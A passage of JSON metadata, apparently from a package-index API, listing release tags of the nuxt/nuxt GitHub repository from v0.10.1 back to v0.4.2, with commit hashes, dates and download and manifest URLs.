cosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep